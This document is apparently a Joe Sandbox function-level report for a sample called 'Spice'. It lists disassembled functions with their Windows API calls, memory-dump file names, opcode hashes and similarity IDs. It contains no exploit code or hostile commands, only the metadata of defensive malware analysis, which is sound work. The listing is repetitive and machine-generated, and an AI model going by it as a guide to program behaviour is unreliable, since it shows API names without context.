Opcode Fuzzy Hash: eafa5bb57be0cad3ade85785fe8bec07720668e7df3c38d25cabedf40b6ff90e
Instruction Fuzzy Hash: DE114839901218FFEB11DF95C984F9DBBB8FB48710F204096E900B7290DA72AE11DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E7166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

DefDlgProcW.USER32(?,00000020,?), ref: 00E716B4
GetClientRect.USER32(?,?), ref: 00EAB93C
GetCursorPos.USER32(?), ref: 00EAB946
ScreenToClient.USER32(?,?), ref: 00EAB951

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 44045c9c078e1b4339f19f10b18f5049c20a5b284b10d1b1e19de4773bc6576b
Instruction ID: 1baf0cd64fbf66598a833a002d1414d7ab4cbdeebd7c3f46a827e70738bcc0ac
Opcode Fuzzy Hash: 44045c9c078e1b4339f19f10b18f5049c20a5b284b10d1b1e19de4773bc6576b
Instruction Fuzzy Hash: 65114375A0021DABCB10EF98C885DFE77B9FB04300F148499E905E7141C730BA51DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E72111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E7214F
GetStockObject.GDI32(00000011), ref: 00E72163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E7216D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: a6ee0a28af03aed0f0170fd349e0af293a2c7316659e7a202d2d729d1055cef0
Instruction ID: 26d5dd81bf508a4f63c362ef5d0c367da0d07bc6b15ff456609c6025ae46266b
Opcode Fuzzy Hash: a6ee0a28af03aed0f0170fd349e0af293a2c7316659e7a202d2d729d1055cef0
Instruction Fuzzy Hash: 4E115B7250264DBFDF124F949C44EEA7BA9FF59364F455119FB0862150CB319C60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED04EC,?,00ED153F,?,00008000), ref: 00ED195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00ED04EC,?,00ED153F,?,00008000), ref: 00ED1983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED04EC,?,00ED153F,?,00008000), ref: 00ED198D
Sleep.KERNEL32(?,?,?,?,?,?,?,00ED04EC,?,00ED153F,?,00008000), ref: 00ED19C0

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 2b97d5615be754ff6125278b7ede7e12408cc6412a34ce22959ae746b7a75138
Instruction ID: 32acdd0ab962a2d1d5291ac1bb25a632b0efe9057e89b0263d4911d1d2420b8d
Opcode Fuzzy Hash: 2b97d5615be754ff6125278b7ede7e12408cc6412a34ce22959ae746b7a75138
Instruction Fuzzy Hash: 76115A31D0061CEBCF009FA4D9A8BEEBB78FF48751F005086E980B2241CB3096519B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EFE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EFE1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00EFE201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00EFE216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00EFE234

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: cfce9f1a1fdb15c580558e801fc842ea63cba7b0f292f49e55aae857627cb264
Instruction ID: 2d97bceed9ca1a3803a0c9d92bcfcf15bc0668defae34b3e004b8fe0ac95323e
Opcode Fuzzy Hash: cfce9f1a1fdb15c580558e801fc842ea63cba7b0f292f49e55aae857627cb264
Instruction Fuzzy Hash: 551130752063089BE7208F51DD08BA37BACEB00B04F108559A759A6171E7B0F504AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EA71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00EA720B

Part of subcall function 00EA78F2: __fltout2.LIBCMT ref: 00EA791B

__cftog_l.LIBCMT ref: 00EA7231
__cftoe_l.LIBCMT ref: 00EA7263

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 9204122124d741c5625c3f50bd6f67de4b84f46591e7e28e916adef12a721010
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: DE01837604814EBBCF129F84CC019ED3F66FB1E344B049555FE9868131D336D971AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EFB937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EFB956
ScreenToClient.USER32(?,?), ref: 00EFB96E
ScreenToClient.USER32(?,?), ref: 00EFB992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EFB9AD

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 95cdc7633c312dff7c3aee945ddcc21a1571cc03e449f2e71f8e7bb9d0e08c40
Instruction ID: 70af1d811a3345bef28667c6339c19f2d4fdd57df47ac075d30688b917e18ab8
Opcode Fuzzy Hash: 95cdc7633c312dff7c3aee945ddcc21a1571cc03e449f2e71f8e7bb9d0e08c40
Instruction Fuzzy Hash: B11143B9D0020DEFDB41CF98C984AEEBBF9FB48310F108156E914E3610DB75AA659F50

Uniqueness

Uniqueness Score: -1.00%

Function 00EFBCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EFBCB6
_memset.LIBCMT ref: 00EFBCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F38F20,00F38F64), ref: 00EFBCF4
CloseHandle.KERNEL32 ref: 00EFBD06

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 973cd2e556ffc2b00f7806f7b5ad4a652193793a4462ed303701b2e6d6f3e329
Instruction ID: afacf84c6f18f456ac08f83b4183b7c37c5c82d0952112bd4098b284bc028a73
Opcode Fuzzy Hash: 973cd2e556ffc2b00f7806f7b5ad4a652193793a4462ed303701b2e6d6f3e329
Instruction Fuzzy Hash: 72F012B25403087FE7502775AC05FBB3A5EEB097A5F001421BA08E61A2DF7A5D11A7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00ED7195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00ED71A1

Part of subcall function 00ED7C7F: _memset.LIBCMT ref: 00ED7CB4

_memmove.LIBCMT ref: 00ED71C4
_memset.LIBCMT ref: 00ED71D1
LeaveCriticalSection.KERNEL32(?), ref: 00ED71E1

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: d5090b51d4f5723df6b4f588574b03f3df3dcbec279d1f8e360232401b193fa3
Instruction ID: 51f534021971346276656d21e19a30dde40042223371dee9def71a069b0301f3
Opcode Fuzzy Hash: d5090b51d4f5723df6b4f588574b03f3df3dcbec279d1f8e360232401b193fa3
Instruction Fuzzy Hash: 43F0F476100104ABCF416F55DC85B4AFB69FF45361F04D055FE086E21BCB31A951DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00EFC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00E716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E71729
Part of subcall function 00E716CF: SelectObject.GDI32(?,00000000), ref: 00E71738
Part of subcall function 00E716CF: BeginPath.GDI32(?), ref: 00E7174F
Part of subcall function 00E716CF: SelectObject.GDI32(?,00000000), ref: 00E71778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC3E8
LineTo.GDI32(00000000,?,?), ref: 00EFC3F5
EndPath.GDI32(00000000), ref: 00EFC405
StrokePath.GDI32(00000000), ref: 00EFC413

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: d160332c1855a8137b63e18368d4685afc8b17ccb0be476d72d8d7bc13535fe3
Instruction ID: eb6ebfef75bdbaca1cf77cc49d5a441cd5b123a29f6fb980206a3c002dc51bd1
Opcode Fuzzy Hash: d160332c1855a8137b63e18368d4685afc8b17ccb0be476d72d8d7bc13535fe3
Instruction Fuzzy Hash: 67F05E3100525DBADB236F54AC0DFDE3F99BF05321F248040FB55611E18BB45551EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00ECAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECAA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECAA82
GetCurrentThreadId.KERNEL32 ref: 00ECAA89
AttachThreadInput.USER32(00000000), ref: 00ECAA90

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: d5376eebd078b07ebf52d6b0863cc84e2215952d837dfe6bd01b9265645674db
Instruction ID: 5c16d21414b41fd95ec64c1eaa501e91eadbc9e3b46cff31835a6836805ddc13
Opcode Fuzzy Hash: d5376eebd078b07ebf52d6b0863cc84e2215952d837dfe6bd01b9265645674db
Instruction Fuzzy Hash: A9E0393154122CBADB215FA29E0CFE73F5DFF157A5F048025F50994060CA728551DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E725F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E7260D
SetTextColor.GDI32(?,000000FF), ref: 00E72617
SetBkMode.GDI32(?,00000001), ref: 00E7262C
GetStockObject.GDI32(00000005), ref: 00E72634
GetWindowDC.USER32(?,00000000), ref: 00EAC1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00EAC1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00EAC1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00EAC203
GetPixel.GDI32(00000000,?,?), ref: 00EAC223
ReleaseDC.USER32(?,00000000), ref: 00EAC22E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: d9bd8fa3aa64165b6ec8a8833f92065494c9f736cc480703f880f0ae0a359659
Instruction ID: 86c2ff506fe4b7fc007b089e123d95f16259f6efeaabc82c25ac7208d37ff51b
Opcode Fuzzy Hash: d9bd8fa3aa64165b6ec8a8833f92065494c9f736cc480703f880f0ae0a359659
Instruction Fuzzy Hash: F7E0E531504248BBDB215FA4AC497D83B11FB15335F148366FA69580E58B714590EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00EC9339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00EC8F04), ref: 00EC9340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EC8F04), ref: 00EC934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00EC8F04), ref: 00EC9354

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c7ae1eff427b1aede4c9134dbdbe9b1b75178acc8c21e39da59a9485d3ac5f1c
Instruction ID: 68d5947a7e6aac0ea5e7d8fa3d8cd536810d147972374a382baf31d4e9c6369d
Opcode Fuzzy Hash: c7ae1eff427b1aede4c9134dbdbe9b1b75178acc8c21e39da59a9485d3ac5f1c
Instruction Fuzzy Hash: 3DE08C72602315EFDB201FB5AE0DF5A3BACFF507A6F108818B285DA090EF389445DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EB0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00EB0679
GetDC.USER32(00000000), ref: 00EB0683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB06A3
ReleaseDC.USER32(?), ref: 00EB06C4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 8887d01e49824c565bd7400505680d46c7c5c1abf2afbc46473e4ca8346a2e15
Instruction ID: d9bff1f92ce62c2e3da25dc757975c8ee18afdde7400e195f6735c464f8e0dd3
Opcode Fuzzy Hash: 8887d01e49824c565bd7400505680d46c7c5c1abf2afbc46473e4ca8346a2e15
Instruction Fuzzy Hash: 25E0EEB1800609EFCB019FA0D808BAE7BF2BB8C310F118009F99AA7260CF399551AF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EB068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00EB068D
GetDC.USER32(00000000), ref: 00EB0697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB06A3
ReleaseDC.USER32(?), ref: 00EB06C4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 95d1d68145a484b8c397645e345e8f7670d49c13ada7b0df47cf1381ef0a955b
Instruction ID: e6fb41afb00c4c45f6c03b20e7265a75f0442e519a17e9876bf9df1f0a3183f5
Opcode Fuzzy Hash: 95d1d68145a484b8c397645e345e8f7670d49c13ada7b0df47cf1381ef0a955b
Instruction Fuzzy Hash: CDE012B1800609EFCB119FA0D808B9D7FF2BB8C310F108009F99AA7260CF399551AF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EDB5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8436A: _wcscpy.LIBCMT ref: 00E8438D

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

__wcsnicmp.LIBCMT ref: 00EDB670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EDB739

Strings

LPT, xrefs: 00EDB66A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 30d4d7d2fa8d56136b4426a8498dfaac2bdec7c2baa5f4415e90e844bfe5a68e
Instruction ID: 16fd1982bdf28900513973f8fb858943e2aa22951555b3af5638c276920328c5
Opcode Fuzzy Hash: 30d4d7d2fa8d56136b4426a8498dfaac2bdec7c2baa5f4415e90e844bfe5a68e
Instruction Fuzzy Hash: 14615E75A00219EFCB14DF54C881EAEB7F4EB48310F05915AF55ABB391EB70AE41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00EB7190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EB7237
_memmove.LIBCMT ref: 00EB7291

Strings

#V, xrefs: 00EB730B, 00EBCAB3, 00EBCACF

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove
String ID: #V
API String ID: 4104443479-3658881132
Opcode ID: e12816fabd4b4132f48e8ffe6bcd7838fdf1b888ad09fa14fc351e55ed6b8ffb
Instruction ID: e8657f59b90518c87d6ffee6165613e276f44b8a9abfe2fea8608c1421a78deb
Opcode Fuzzy Hash: e12816fabd4b4132f48e8ffe6bcd7838fdf1b888ad09fa14fc351e55ed6b8ffb
Instruction Fuzzy Hash: 9C518370904609DFCF24CF68D880AEEBBF1FF45308F249529E89AE7650E731A955CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E7E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00E7E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00E7E037

Strings

@, xrefs: 00E7E02B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: baa6dc63391f44c0e6504b2ca2a6f0afc9e87b2451540efeae7c4fe46eb9b701
Instruction ID: 5b0a8277d28108235eb8213436522d2e58db2bc9154b744290e4633dbf8471d6
